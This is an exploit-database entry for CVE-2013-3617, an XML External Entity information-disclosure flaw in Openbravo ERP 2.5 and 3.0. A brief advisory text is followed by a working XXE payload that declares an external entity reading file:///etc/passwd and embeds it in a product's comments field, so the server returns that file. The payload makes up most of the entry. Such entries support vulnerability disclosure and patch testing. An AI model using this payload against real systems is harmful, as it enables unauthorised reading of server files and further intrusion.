Openbravo ERP - XML External Entity Information Disclosure
Author: Tod Beardsley
type: remote
platform: multiple
port:
date_added: 2013-10-30
date_updated: 2015-11-27
verified: 1
codes: CVE-2013-3617;OSVDB-99141
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/63431/info
Openbravo ERP is prone to an information-disclosure vulnerability.
An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.
Openbravo ERP 2.5 and 3.0 are vulnerable.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT comments ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<ob:Openbravo xmlns:ob="http://www.example.com"
xmlns:xsi="http://www.example1.com/2001/XMLSchema-instance">
<Product id="C970393BDF6C43E2B030D23482D88EED" identifier="Zumo de Piñ,5L">
<id>C970393BDF6C43E2B030D23482D88EED</id>
<comments>&xxe;</comments>
</Product>
</ob:Openbravo>